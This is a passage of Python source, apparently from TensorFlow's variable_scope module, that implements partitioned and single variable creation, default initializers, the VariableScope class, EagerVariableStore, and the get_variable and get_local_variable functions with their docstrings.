along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.compat.v1.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: the name of the new or existing sharded variable.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
shape: shape of the new or existing sharded variable.
dtype: type of the new or existing sharded variable (defaults to
`DT_FLOAT`).
initializer: initializer for the sharded variable.
regularizer: a (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation of
variables.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable which has well-defined semantics. Defaults
to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A `PartitionedVariable` object.
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
when violating reuse during variable creation, or if an existing
sharded variable exists for the given name but with different sharding.
"""
initializing_from_value = initializer is not None and isinstance(
initializer, ops.Tensor)
if name in self._vars:
raise ValueError(
"A partitioner was provided, but an unpartitioned version of the "
"variable was found: %s. Perhaps a variable of the same name was "
"already created without partitioning?" % name)
shape = tensor_shape.as_shape(shape)
if initializing_from_value:
shape = shape.merge_with(initializer.get_shape())
partitions = None
if not reuse or partitioner:
partitions = _call_partitioner(partitioner, shape, dtype)
if name in self._partitioned_vars:
if reuse is False:
raise ValueError(
"Partitioned variable with name %s already exists. Did you mean to "
"set reuse=True or reuse=tf.AUTO_REUSE in VarScope?" % name)
existing_var = self._partitioned_vars[name]
if not shape.is_compatible_with(existing_var.get_shape()):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified shape %s "
"and found shape %s." % (name, shape, existing_var.get_shape()))
if not dtype.is_compatible_with(existing_var.dtype):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified dtype %s "
"and found dtype %s." % (name, dtype.name, existing_var.dtype.name))
# pylint: disable=protected-access
if (partitions is not None and
existing_var._get_partitions() != partitions):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified partitions "
"%s and found partitions %s." %
(name, partitions, existing_var._get_partitions()))
# pylint: enable=protected-access
return existing_var
if reuse is True:
raise ValueError("PartitionedVariable %s does not exist, or was not "
"created with tf.get_variable(). Did you mean to set "
"reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
slice_dim, num_slices = _get_slice_dim_and_num_slices(partitions)
if "%s/part_0" % name in self._vars:
if "%s/part_%d" % (name, num_slices - 1) not in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but %s/part_%d was not." %
(num_slices, name, name, num_slices - 1))
if "%s/part_%d" % (name, num_slices) in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but so was the extra shard %s/part_%d." %
(num_slices, name, name, num_slices))
vs = []
for i, (var_offset, var_shape) in enumerate(
_iter_slices(shape.as_list(), num_slices, slice_dim)):
partition_info = _PartitionInfo(
full_shape=shape.as_list(), var_offset=var_offset)
var_full_name = "%s/part_%d" % (name, i)
with ops.name_scope(
var_full_name + "/PartitionedInitializer", skip_on_eager=False):
# Create the tensor to initialize the variable with default value.
if initializer is None:
init, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
if initializing_from_value:
init_shape = None
else:
init_shape = var_shape
elif callable(initializer):
init = initializer
init_shape = var_shape
elif isinstance(initializer, ops.Tensor):
init = array_ops.slice(initializer, var_offset, var_shape)
# Use the dtype of the given tensor.
dtype = init.dtype.base_dtype
init_shape = None
else:
init = ops.convert_to_tensor(initializer, dtype=dtype)
init = array_ops.slice(init, var_offset, var_shape)
init_shape = None
with ops.name_scope(None):
var = self._get_single_variable(
name=var_full_name,
shape=init_shape,
dtype=dtype,
initializer=init,
partition_info=partition_info,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: disable=protected-access
var._set_save_slice_info(
variables.Variable.SaveSliceInfo(name, shape.as_list(), var_offset,
var_shape))
vs.append(var)
# pylint: enable=protected-access
partitioned_var = variables.PartitionedVariable(
name=name,
shape=shape,
dtype=dtype,
variable_list=vs,
partitions=partitions)
if not context.executing_eagerly() or self._store_eager_variables:
self._partitioned_vars[name] = partitioned_var
return partitioned_var
def _get_single_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
partition_info=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Get or create a single Variable (e.g.
a shard or entire variable).
See the documentation of get_variable above (ignore partitioning components)
for details.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
initializer: see get_variable.
regularizer: see get_variable.
partition_info: _PartitionInfo object.
reuse: see get_variable.
trainable: see get_variable.
collections: see get_variable.
caching_device: see get_variable.
validate_shape: see get_variable.
use_resource: see get_variable.
constraint: see get_variable.
synchronization: see get_variable.
aggregation: see get_variable.
Returns:
A Variable. See documentation of get_variable above.
Raises:
ValueError: See documentation of get_variable above.
"""
# Set to true if initializer is a constant.
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if shape is not None and initializing_from_value:
raise ValueError("If initializer is a constant, do not specify shape.")
dtype = dtypes.as_dtype(dtype)
shape = tensor_shape.as_shape(shape)
if name in self._vars:
# Here we handle the case when returning an existing variable.
if reuse is False:
var = self._vars[name]
err_msg = ("Variable %s already exists, disallowed."
" Did you mean to set reuse=True or "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# ResourceVariables don't have an op associated with so no traceback
if isinstance(var, resource_variable_ops.ResourceVariable):
raise ValueError(err_msg)
tb = var.op.traceback[::-1]
# Throw away internal tf entries and only take a few lines. In some
# cases the traceback can be longer (e.g. if someone uses factory
# functions to create variables) so we take more than needed in the
# default case.
tb = [x for x in tb if "tensorflow/python" not in x[0]][:5]
raise ValueError("%s Originally defined at:\n\n%s" %
(err_msg, "".join(traceback.format_list(tb))))
found_var = self._vars[name]
if not shape.is_compatible_with(found_var.get_shape()):
raise ValueError("Trying to share variable %s, but specified shape %s"
" and found shape %s." %
(name, shape, found_var.get_shape()))
if not dtype.is_compatible_with(found_var.dtype):
dtype_str = dtype.name
found_type_str = found_var.dtype.name
raise ValueError("Trying to share variable %s, but specified dtype %s"
" and found dtype %s." %
(name, dtype_str, found_type_str))
return found_var
# The code below handles only the case of creating a new variable.
if reuse is True:
raise ValueError("Variable %s does not exist, or was not created with "
"tf.get_variable(). Did you mean to set "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# Create the tensor to initialize the variable with default value.
if initializer is None:
initializer, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
# Enter an init scope when creating the initializer.
with ops.init_scope():
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if tf_inspect.isclass(initializer):
initializer = initializer()
if shape.is_fully_defined():
if "partition_info" in tf_inspect.getargspec(initializer).args:
init_val = functools.partial(initializer,
shape.as_list(),
dtype=dtype,
partition_info=partition_info)
else:
init_val = functools.partial(initializer,
shape.as_list(), dtype=dtype)
variable_dtype = dtype.base_dtype
elif _needs_no_arguments(initializer):
init_val = initializer
variable_dtype = None
else:
raise ValueError("The initializer passed is not valid. It should "
"be a callable with no arguments and the "
"shape should not be provided or an instance of "
"`tf.keras.initializers.*' and `shape` should be "
"fully defined.")
# Create the variable.
if use_resource is None:
# Set the default value if unspecified.
use_resource = _DEFAULT_USE_RESOURCE
v = variables.VariableV1(
initial_value=init_val,
name=name,
trainable=trainable,
collections=collections,
caching_device=caching_device,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation)
if context.executing_eagerly() and self._store_eager_variables:
if collections:
ops.add_to_collections(collections, v)
else:
ops.add_to_collection(ops.GraphKeys.GLOBAL_VARIABLES, v)
if trainable:
ops.add_to_collection(ops.GraphKeys.TRAINABLE_VARIABLES, v)
if not context.executing_eagerly() or self._store_eager_variables:
# In eager mode we do not want to keep default references to Variable
# objects as this will prevent their memory from being released.
self._vars[name] = v
logging.vlog(1, "Created variable %s with shape %s and init %s", v.name,
format(shape), initializer)
# Run the regularizer if requested and save the resulting loss.
if regularizer:
def make_regularizer_op():
with ops.colocate_with(v):
with ops.name_scope(name + "/Regularizer/"):
return regularizer(v)
if regularizer(v) is not None:
lazy_eval_tensor = _LazyEvalTensor(make_regularizer_op)
ops.add_to_collection(ops.GraphKeys.REGULARIZATION_LOSSES,
lazy_eval_tensor)
return v
# Initialize variable when no initializer provided
def _get_default_initializer(self, name, shape=None, dtype=dtypes.float32):
"""Provide a default initializer and a corresponding value.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
Returns:
initializer and initializing_from_value. See get_variable above.
Raises:
ValueError: When giving unsupported dtype.
"""
del shape
# If dtype is DT_FLOAT, provide a uniform unit scaling initializer
if dtype.is_floating:
initializer = init_ops.glorot_uniform_initializer()
initializing_from_value = False
# If dtype is DT_INT/DT_UINT, provide a default value `zero`
# If dtype is DT_BOOL, provide a default value `FALSE`
elif (dtype.is_integer or dtype.is_unsigned or dtype.is_bool or
dtype == dtypes.string):
initializer = init_ops.zeros_initializer()
initializing_from_value = False
# NOTES:Do we need to support for handling DT_STRING and DT_COMPLEX here?
else:
raise ValueError("An initializer for variable %s of %s is required" %
(name, dtype.base_dtype))
return initializer, initializing_from_value
class _LazyEvalTensor(core.Tensor):
"""A Tensor-like object that only evaluates its thunk when used."""
def __init__(self, thunk):
"""Initializes a _LazyEvalTensor object.
Args:
thunk: A callable. A thunk which computes the value of the tensor.
"""
self._thunk = thunk
self._master_tensor = thunk()
def _as_tensor(self, dtype=None, name=None, as_ref=False):
del name
assert not as_ref
assert dtype in [None, self.dtype]
return self._thunk()
def _make_master_property(name):
@property
def prop(self):
return getattr(self._master_tensor, name) # pylint: disable=protected-access
return prop
_master_property_list = ("device", "dtype", "graph", "name", "op", "shape",
"value_index")
for _name in _master_property_list:
setattr(_LazyEvalTensor, _name, _make_master_property(_name))
def _make_master_method(name):
def method(self, *args, **kwargs):
return getattr(self._master_tensor, name)(*args, **kwargs) # pylint: disable=protected-access
return method
_master_method_list = ("get_shape", "__str__", "shape_as_list")
for _name in _master_method_list:
setattr(_LazyEvalTensor, _name, _make_master_method(_name))
def _make_op_method(name):
def method(self, *args, **kwargs):
return getattr(self._as_tensor(), name)(*args, **kwargs) # pylint: disable=protected-access
return method
_op_list = ("__abs__", "__add__", "__and__", "__bool__", "__div__", "__eq__",
"__floordiv__", "__ge__", "__getitem__", "__gt__", "__invert__",
"__iter__", "__le__", "__len__", "__lt__", "__matmul__", "__mod__",
"__mul__", "__ne__", "__neg__", "__nonzero__", "__or__", "__pow__",
"__radd__", "__rand__", "__rdiv__", "__rfloordiv__", "__rmatmul__",
"__rmod__", "__rmul__", "__ror__", "__rpow__", "__rsub__",
"__rtruediv__", "__rxor__", "__sub__", "__truediv__", "__xor__",
"eval", "numpy")
for _name in _op_list:
setattr(_LazyEvalTensor, _name, _make_op_method(_name))
ops.register_tensor_conversion_function(
_LazyEvalTensor,
lambda val, dtype, name, as_ref: val._as_tensor(dtype, name, as_ref) # pylint: disable=protected-access
)
session.register_session_run_conversion_functions(
_LazyEvalTensor,
lambda fetch: ([fetch._master_tensor], lambda fetched_vals: fetched_vals[0]) # pylint: disable=protected-access
)
# To stop regularization, use this regularizer
@tf_export(v1=["no_regularizer"])
def no_regularizer(_):
"""Use this function to prevent regularization of variables."""
return None
# TODO(alive): support caching devices and partitioned variables in Eager mode.
@tf_export(v1=["VariableScope"])
class VariableScope(object):
"""Variable scope object to carry defaults to provide to `get_variable`.
Many of the arguments we need for `get_variable` in a variable store are most
easily handled with a context. This object is used for the defaults.
Attributes:
name: name of the current scope, used as prefix in get_variable.
initializer: default initializer passed to get_variable.
regularizer: default regularizer passed to get_variable.
reuse: Boolean, None, or tf.compat.v1.AUTO_REUSE, setting the reuse in
get_variable. When eager execution is enabled this argument is always
forced to be False.
caching_device: string, callable, or None: the caching device passed to
get_variable.
partitioner: callable or `None`: the partitioner passed to `get_variable`.
custom_getter: default custom getter passed to get_variable.
name_scope: The name passed to `tf.name_scope`.
dtype: default type passed to get_variable (defaults to DT_FLOAT).
use_resource: if False, create a normal Variable; if True create an
experimental ResourceVariable with well-defined semantics. Defaults to
False (will later change to True). When eager execution is enabled this
argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
"""
def __init__(self,
reuse,
name="",
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
name_scope="",
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a new VariableScope with the given properties."""
self._name = name
self._initializer = initializer
self._regularizer = regularizer
self._reuse = reuse
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._name_scope = name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if context.executing_eagerly():
if self._caching_device is not None:
raise NotImplementedError("Caching devices is not yet supported "
"when eager execution is enabled.")
self._reuse = AUTO_REUSE
self._use_resource = True
@property
def name(self):
return self._name
@property
def original_name_scope(self):
return self._name_scope
@property
def reuse(self):
return self._reuse
@property
def initializer(self):
return self._initializer
@property
def dtype(self):
return self._dtype
@property
def use_resource(self):
return self._use_resource
@property
def regularizer(self):
return self._regularizer
@property
def caching_device(self):
return self._caching_device
@property
def partitioner(self):
return self._partitioner
@property
def custom_getter(self):
return self._custom_getter
@property
def constraint(self):
return self._constraint
def reuse_variables(self):
"""Reuse variables in this scope."""
self._reuse = True
def set_initializer(self, initializer):
"""Set initializer for this scope."""
self._initializer = initializer
def set_dtype(self, dtype):
"""Set data type for this scope."""
self._dtype = dtype
def set_use_resource(self, use_resource):
"""Sets whether to use ResourceVariables for this scope."""
if context.executing_eagerly() and not use_resource:
raise ValueError("When eager execution is enabled, "
"use_resource cannot be set to false.")
self._use_resource = use_resource
def set_regularizer(self, regularizer):
"""Set regularizer for this scope."""
self._regularizer = regularizer
def set_caching_device(self, caching_device):
"""Set caching_device for this scope."""
if context.executing_eagerly():
raise NotImplementedError("Caching devices are not yet supported "
"when eager execution is enabled.")
self._caching_device = caching_device
def set_partitioner(self, partitioner):
"""Set partitioner for this scope."""
self._partitioner = partitioner
def set_custom_getter(self, custom_getter):
"""Set custom getter for this scope."""
self._custom_getter = custom_getter
def get_collection(self, name):
"""Get this scope's variables."""
scope = self._name + "/" if self._name else ""
return ops.get_collection(name, scope)
def trainable_variables(self):
"""Get this scope's trainable variables."""
return self.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
def global_variables(self):
"""Get this scope's global variables."""
return self.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
def local_variables(self):
"""Get this scope's local variables."""
return self.get_collection(ops.GraphKeys.LOCAL_VARIABLES)
def get_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if regularizer is None:
regularizer = self._regularizer
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if custom_getter is None:
custom_getter = self._custom_getter
if context.executing_eagerly():
reuse = False
use_resource = True
else:
if reuse is None:
reuse = self._reuse
if use_resource is None:
use_resource = self._use_resource
full_name = self.name + "/" + name if self.name else name
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None, skip_on_eager=False):
# Check that `initializer` dtype and `dtype` are consistent before
# replacing them with defaults.
if (dtype is not None and initializer is not None and
not callable(initializer)):
init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
if init_dtype != dtype:
raise ValueError("Initializer type '%s' and explicit dtype '%s' "
"don't match." % (init_dtype, dtype))
if initializer is None:
initializer = self._initializer
if constraint is None:
constraint = self._constraint
if dtype is None:
dtype = self._dtype
return var_store.get_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if initializer is None:
initializer = self._initializer
if regularizer is None:
regularizer = self._regularizer
if constraint is None:
constraint = self._constraint
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if dtype is None:
dtype = self._dtype
if use_resource is None:
use_resource = self._use_resource
if self._custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % self._custom_getter)
if partitioner is None:
raise ValueError("No partitioner was specified")
# This allows the variable scope name to be used as the variable name if
# this function is invoked with an empty name arg, for backward
# compatibility with create_partitioned_variables().
full_name_list = []
if self.name:
full_name_list.append(self.name)
if name:
full_name_list.append(name)
full_name = "/".join(full_name_list)
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None, skip_on_eager=False):
# pylint: disable=protected-access
return var_store._get_partitioned_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=self.reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
_VARSTORE_KEY = ("__variable_store",)
_VARSCOPESTORE_KEY = ("__varscope",)
class _VariableScopeStore(threading.local):
"""A thread local store for the current variable scope and scope counts."""
def __init__(self):
super(_VariableScopeStore, self).__init__()
self.current_scope = VariableScope(False)
self.variable_scopes_count = {}
def open_variable_scope(self, scope_name):
if scope_name in self.variable_scopes_count:
self.variable_scopes_count[scope_name] += 1
else:
self.variable_scopes_count[scope_name] = 1
def close_variable_subscopes(self, scope_name):
for k in list(self.variable_scopes_count.keys()):
if scope_name is None or k.startswith(scope_name + "/"):
self.variable_scopes_count[k] = 0
def variable_scope_count(self, scope_name):
return self.variable_scopes_count.get(scope_name, 0)
def get_variable_scope_store():
"""Returns the variable scope store for current thread."""
scope_store = ops.get_collection(_VARSCOPESTORE_KEY)
if not scope_store:
scope_store = _VariableScopeStore()
ops.add_to_collection(_VARSCOPESTORE_KEY, scope_store)
else:
scope_store = scope_store[0]
return scope_store
@tf_export(v1=["get_variable_scope"])
def get_variable_scope():
"""Returns the current variable scope."""
return get_variable_scope_store().current_scope
def _get_default_variable_store():
store = ops.get_collection(_VARSTORE_KEY)
if store:
return store[0]
store = _VariableStore()
ops.add_to_collection(_VARSTORE_KEY, store)
return store
@tf_contextlib.contextmanager
def with_variable_store(store):
store_collection = ops.get_collection_ref(_VARSTORE_KEY)
old = list(store_collection)
store_collection[:] = [store]
try:
yield
finally:
store_collection[:] = old
class EagerVariableStore(object):
"""Wrapper allowing functional layers to be used with eager execution.
When eager execution is enabled Variables get deleted when they go out of
scope, and are not stored in global collections by default. A lot of code
(mostly the functional layers in tf.layers) assumes that variables are kept in
a global list.
EagerVariableStore can be used in conjunction with this code to make it
eager-friendly. For example, to create a dense layer, use:
```
container = tfe.EagerVariableStore()
for input in dataset_iterator:
with container.as_default():
x = tf.compat.v1.layers.dense(input, name="l1")
print(container.variables) # Should print the variables used in the layer.
```
"""
def __init__(self, store=None):
if store is not None:
if not store._store_eager_variables: # pylint: disable=protected-access
raise ValueError("Cannot construct EagerVariableStore from a "
"VariableStore object that does not hold eager "
"variables.")
self._store = store
else:
self._store = _VariableStore()
self._store._store_eager_variables = True # pylint: disable=protected-access
def as_default(self):
return with_variable_store(self._store)
def variables(self):
return sorted(self._store._vars.values(), key=lambda x: x.name) # pylint: disable=protected-access
def trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def non_trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if not x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def copy(self):
"""Copy this variable store and all of its contents.
Variables contained in this store will be copied over to the new variable
store, meaning that they can be modified without affecting the variables in
this store.
Returns:
A new EagerVariableStore instance containing copied variables.
"""
# pylint: disable=protected-access
new_store = EagerVariableStore()
for key, var in iteritems(self._store._vars):
# Strip device out of variable name.
try:
index = var.name.index(":")
except ValueError:
stripped_var_name = var.name
else:
stripped_var_name = var.name[:index]
# Create new variable with same value, name, and "trainable" flag.
new_var = resource_variable_ops.ResourceVariable(
var.read_value(), name=stripped_var_name, trainable=var.trainable)
new_store._store._vars[key] = new_var
return new_store
# pylint: enable=protected-access
# The argument list for get_variable must match arguments to get_local_variable.
# So, if you are updating the arguments, also update arguments to
# get_local_variable below.
@tf_export(v1=["get_variable"])
def get_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
return get_variable_scope().get_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
get_variable_or_local_docstring = ("""%s
%sThis function prefixes the name with the current variable scope
and performs reuse checks. See the
[Variable Scope How To](https://tensorflow.org/guide/variables)
for an extensive description of how reusing works. Here is a basic example:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
If initializer is `None` (the default), the default initializer passed in
the variable scope will be used. If that one is `None` too, a
`glorot_uniform_initializer` will be used. The initializer can also be
a Tensor, in which case the variable is initialized to this value and shape.
Similarly, if the regularizer is `None` (the default), the default regularizer
passed in the variable scope will be used (if that is `None` too,
then by default no regularization is performed).
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created. Can either be
an initializer object or a Tensor. If it's a Tensor, its shape must be known
unless validate_shape is False.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
`tf.GraphKeys.REGULARIZATION_LOSSES` and can be used for regularization.
%scollections: List of graph collections keys to add the Variable to.
Defaults to `[%s]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known. For this to be used the initializer must be a Tensor and
not an initializer object.
use_resource: If False, creates a regular Variable. If true, creates an
experimental ResourceVariable instead with well-defined semantics.
Defaults to False (will later change to True). When eager execution is
enabled this argument is always forced to be True.
custom_getter: Callable that takes as a first argument the true getter, and
allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when violating reuse during variable creation, or when `initializer` dtype
and `dtype` don't match. Reuse is set inside `variable_scope`.
""")
get_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing variable with these parameters or create a new one.", "",
"trainable: If `True` also add the variable to the graph collection\n"
" `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n ",
"GraphKeys.GLOBAL_VARIABLES")
# The argument list for get_local_variable must match arguments to get_variable.
# So, if you are updating the arguments, also update arguments to get_variable.
@tf_export(v1=["get_local_variable"])
def get_local_variable( # pylint: disable=missing-docstring
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=False, # pylint: disable=unused-argument
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
if collections:
collections += [ops.GraphKeys.LOCAL_VARIABLES]
else:
collections = [ops.GraphKeys.LOCAL_VARIABLES]
return get_variable(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=False,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation,
custom_getter=custom_getter,
constraint=constraint)
get_local_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing *local* variable or creates a new one.",
"Behavior is the same as in `get_variable`, except that variables are\n"
"added to the `LOCAL_VARIABLES` collection and `trainable` is set to\n"
"`False`.\n", "", "GraphKeys.LOCAL_VARIABLES")
def _get_partitioned_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
